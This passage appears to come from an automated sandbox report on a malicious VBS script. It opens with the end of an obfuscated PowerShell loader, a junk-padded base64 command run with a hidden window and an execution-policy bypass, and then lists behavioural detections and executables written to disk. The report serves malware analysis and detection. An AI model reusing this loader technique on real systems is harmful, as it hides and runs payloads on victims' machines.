çcecwBtUHOWdGtçceCcUHOWdGtçceIUHOWdGtçceUHOWdGtçcesUHOWdGtçceCUHOWdGtçceUHOWdGtçceJwUHOWdGtçce1UHOWdGtçceCcUHOWdGtçceIUHOWdGtçceUHOWdGtçcesUHOWdGtçceCUHOWdGtçceUHOWdGtçceJwBDUHOWdGtçceDoUHOWdGtçceXUHOWdGtçceBXUHOWdGtçceGkUHOWdGtçcebgBkUHOWdGtçceG8UHOWdGtçcedwBzUHOWdGtçceFwUHOWdGtçceVUHOWdGtçceBlUHOWdGtçceG0UHOWdGtçcecUHOWdGtçceBcUHOWdGtçceCcUHOWdGtçceLUHOWdGtçceUHOWdGtçcegUHOWdGtçceCcUHOWdGtçceaUHOWdGtçceB0UHOWdGtçceG0UHOWdGtçcebUHOWdGtçceBjUHOWdGtçceCcUHOWdGtçceKQUHOWdGtçcepUHOWdGtçceUHOWdGtçce==';$OWjuxd = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64string( $codigo.replace('UHOWdGtçce','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD"

Creates a suspicious Powershell process (11 events)

option	-windowstyle hidden	value	Attempts to execute command with a hidden window
option	-executionpolicy bypass	value	Attempts to bypass execution policy
option	-noprofile	value	Does not load current user profile
option	-windowstyle hidden	value	Attempts to execute command with a hidden window
option	-windowstyle hidden	value	Attempts to execute command with a hidden window
option	-executionpolicy bypass	value	Attempts to bypass execution policy
option	-noprofile	value	Does not load current user profile
option	-windowstyle hidden	value	Attempts to execute command with a hidden window
option	-executionpolicy bypass	value	Attempts to bypass execution policy
option	-noprofile	value	Does not load current user profile
option	-windowstyle hidden	value	Attempts to execute command with a hidden window

The processes wscript.exe, powershell.exe wrote an executable file to disk which it then attempted to execute (20 events)

file	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
file	C:\Windows\System32\ie4uinit.exe
file	C:\Program Files\Windows Sidebar\sidebar.exe
file	C:\Windows\System32\WindowsAnytimeUpgradeUI.exe
file	C:\Windows\System32\xpsrchvw.exe
file	C:\Windows\System32\displayswitch.exe
file	C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe
file	C:\Windows\System32\mblctr.exe
file	C:\Windows\System32\mstsc.exe
file	C:\Windows\System32\SnippingTool.exe
file	C:\Windows\System32\SoundRecorder.exe
file	C:\Windows\System32\dfrgui.exe
file	C:\Windows\System32\msinfo32.exe
file	C:\Windows\System32\rstrui.exe
file	C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.exe
file	C:\Program Files\Windows Journal\Journal.exe
file	C:\Windows\System32\MdSched.exe
file	C:\Windows\System32\msconfig.exe
file	C:\Windows\System32\recdisc.exe
file	C:\Windows\System32\msra.exe

HTMLcachesIE.vbs

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All